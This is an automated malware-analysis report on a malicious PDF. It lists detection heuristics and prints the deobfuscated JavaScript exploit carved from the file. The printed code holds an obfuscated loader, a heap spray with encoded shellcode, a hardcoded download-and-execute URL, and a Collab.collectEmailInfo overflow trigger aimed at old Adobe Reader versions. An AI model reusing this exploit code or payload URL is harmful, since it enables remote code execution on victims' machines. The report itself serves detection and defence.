PDF malware analysis — malicious · 79c4f7c1dcafab6c

MALICIOUS

PDF

2.9 KB

MD5: c3c3cf86c36e0b92d1a4472ecfaf8c6d SHA-1: 3f49c6ade5f7c12490b7649fe2ecd7e4d0070952 SHA-256: 79c4f7c1dcafab6c4204555b1cd011b9fa0e08fd7bdbf4ff89f8d2c2b5f3e955

258 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains JavaScript that exploits CVE-2007-5659 in Adobe Reader. The deobfuscated JavaScript contains a URL, http://datafolders.ru/old_info/getexe.php?spl=pdf_exp, which is likely used to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://datafolders.ru/old_info/getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js` `763f71615cbcbbb661b91685e947dad2b73a848b3973de5e7352a978f677dba0`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	20529 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode64(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyXXXStr.indexOf(input.charAt(i++)); enc2 = keyXXXStr.indexOf(input.charAt(i++)); enc3 = keyXXXStr.indexOf(input.charAt(i++)); enc4 = keyXXXStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) \| (enc2 >> 4); chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2); chr3 = ((enc3 & 3) << 6) \| enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while (i < input.length); return output; } var aasd = decode64("DQogdmFyIHBRbmpiSzggPSBuZXcgQXJyYXkoKTsNCiB2YXIgd005VFBndTsNCiB2YXIgbGF2ZSA9IGV2YWw7DQogIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2ZSU0MyUzMiU0YSU3YSU2NSU2ZiUyOCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUyYyUyMCU2YyU2NyU2NSU0ZCUzOCU1MyUzNyUyOSUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUyMCUzYyUyMCU2YyU2NyU2NSU0ZCUzOCU1MyUzNyUyOSUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUyMCUyYiUzZCUyMCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUzYiUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUyMCUzZCUyMCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUyZSU3MyU3NSU2MiU3MyU3NCU3MiU2OSU2ZSU2NyUyOCUzMCUyYyUyMCU2YyU2NyU2NSU0ZCUzOCU1MyUzNyUyMCUyZiUyMCUzMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCU3MiU2NSU3NCU3NSU3MiU2ZSUyMCU1MSUzOSU3MCU3NSU2ZSU3NCU0OCUzYiUyMCUyMCUyMCU3ZCUyMCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2NSU2ZSU0NCU1NiU0MSU0YyU3YSUyOCU0ZCUzMyU3NSU1NiU0NiU3NiU2ZiUyOSUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU0ZCUzMyU3NSU1NiU0NiU3NiU2ZiUyMCUzZCUzZCUyMCUzMCUyOSUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2MiU2MSU2NCUzMSU2YSU1MyU3NSUyMCUzZCUyMCUzMCU3OCUzMCU2MyUzMCU2MyUzMCU2MyUzMCU2MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0OSU0ZCU0MyU3MCUzMyU3MiU0MyUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU ... (truncated)
`generic_stage_recovery_000.js` `a1aeb4dd06a9962eef5f0e27dbfd5439a3a413c2f10b0672a75ddabac26971e2`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	5030 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pQnjbK8 = new Array(); var wM9TPgu; var lave = eval; lave(unescape(" function nC2Jzeo(Q9puntH, lgeM8S7) { while(Q9puntH.length * 2 < lgeM8S7) { Q9puntH += Q9puntH; } Q9puntH = Q9puntH.substring(0, lgeM8S7 / 2); return Q9puntH; } ")); lave(unescape(" function enDVALz(M3uVFvo) { if(M3uVFvo == 0) { var bad1jSu = 0x0c0c0c0c; var IMCp3rC = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u642F%u7461%u6661%u6C6F%u6564%u7372%u722E%u2F75%u6C6F%u5F64%u6E69%u6F66%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070"); } else if(M3uVFvo == 1) { bad1jSu = 0x30303030; var IMCp3rC = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u642F%u7461%u6661%u6C6F%u6564%u7372%u722E%u2F75%u6C6F%u5F64%u6E69%u6F66%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070"); } else if(M3uVFvo == 2) { var IMCp3rC = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u642F%u7461%u6661%u6C6F%u6564%u7372%u722E%u2F75%u6C6F%u5F64%u6E69%u6F66%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070"); } var PKIs9WN = 0x400000; var HrNsuHO = IMCp3rC.length * 2; var lgeM8S7 = PKIs9WN - (HrNsuHO + 0x38); var Q9puntH = unescape("%u9090%u9090"); Q9puntH = nC2Jzeo(Q9puntH, lgeM8S7); var bDDNnqN = (bad1jSu - 0x400000) / PKIs9WN; for(var kII4fVt = 0; kII4fVt < bDDNnqN; kII4fVt++) { pQnjbK8[kII4fVt] = Q9puntH + IMCp3rC; } } ")); lave(unescape(" function rN6rhOj() { var ju89mU2 = 0; var omPpzdD = app.viewerVersion.toString(); app.clearTimeOut(wM9TPgu); if((omPpzdD >= 8 && omPpzdD < 8.102) \|\| omPpzdD < 7.1) { enDVALz(0); var XTbJmuN = unescape("%u0c0c%u0c0c"); while(XTbJmuN.length < 44952) XTbJmuN += XTbJmuN; var ZPG0mM1 = this; var XkkKfsT = Collab; ZPG0mM1["collabStore"] = XkkKfsT["collectEmailInfo"]( { subj : "", msg : XTbJmuN } ); } if((omPpzdD >= 8.102 && omPpzdD < 8.104) \|\| (omPpzdD >= 9 && omPpzdD < 9.1) \|\| omPpzdD <= 7.101) { try ... (truncated)
`generic_stage_recovery_001.js` `c21aeaf8c6034137648e49f27d710444f4a2eaff429dcf7a0a4200d5a7d0ce8a`	deobfuscated-js	generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6	5026 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pQnjbK8 = new Array(); var wM9TPgu; var lave = eval; lave(unescape(" function nC2Jzeo(Q9puntH, lgeM8S7) { while(Q9puntH.length * 2 < lgeM8S7) { Q9puntH += Q9puntH; } Q9puntH = Q9puntH.substring(0, lgeM8S7 / 2); return Q9puntH; } ")); lave(unescape(" function enDVALz(M3uVFvo) { if(M3uVFvo == 0) { var bad1jSu = 0x0c0c0c0c; var IMCp3rC = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u642F%u7461%u6661%u6C6F%u6564%u7372%u722E%u2F75%u6C6F%u5F64%u6E69%u6F66%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070"); } else if(M3uVFvo == 1) { bad1jSu = 0x30303030; var IMCp3rC = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u642F%u7461%u6661%u6C6F%u6564%u7372%u722E%u2F75%u6C6F%u5F64%u6E69%u6F66%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070"); } else if(M3uVFvo == 2) { var IMCp3rC = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u642F%u7461%u6661%u6C6F%u6564%u7372%u722E%u2F75%u6C6F%u5F64%u6E69%u6F66%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070"); } var PKIs9WN = 0x400000; var HrNsuHO = IMCp3rC.length * 2; var lgeM8S7 = PKIs9WN - (HrNsuHO + 0x38); var Q9puntH = unescape("%u9090%u9090"); Q9puntH = nC2Jzeo(Q9puntH, lgeM8S7); var bDDNnqN = (bad1jSu - 0x400000) / PKIs9WN; for(var kII4fVt = 0; kII4fVt < bDDNnqN; kII4fVt++) { pQnjbK8[kII4fVt] = Q9puntH + IMCp3rC; } } ")); lave(unescape(" function rN6rhOj() { var ju89mU2 = 0; var omPpzdD = app.viewerVersion.toString(); app.clearTimeOut(wM9TPgu); if((omPpzdD >= 8 && omPpzdD < 8.102) \|\| omPpzdD < 7.1) { enDVALz(0); var XTbJmuN = unescape("%u0c0c%u0c0c"); while(XTbJmuN.length < 44952) XTbJmuN += XTbJmuN; var ZPG0mM1 = this; var XkkKfsT = Collab; ZPG0mM1["collabStore"] = XkkKfsT["collectEmailInfo"]( { subj : "", msg : XTbJmuN } ); } if((omPpzdD >= 8.102 && omPpzdD < 8.104) \|\| (omPpzdD >= 9 && omPpzdD < 9.1) \|\| omPpzdD <= 7.101) { try ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.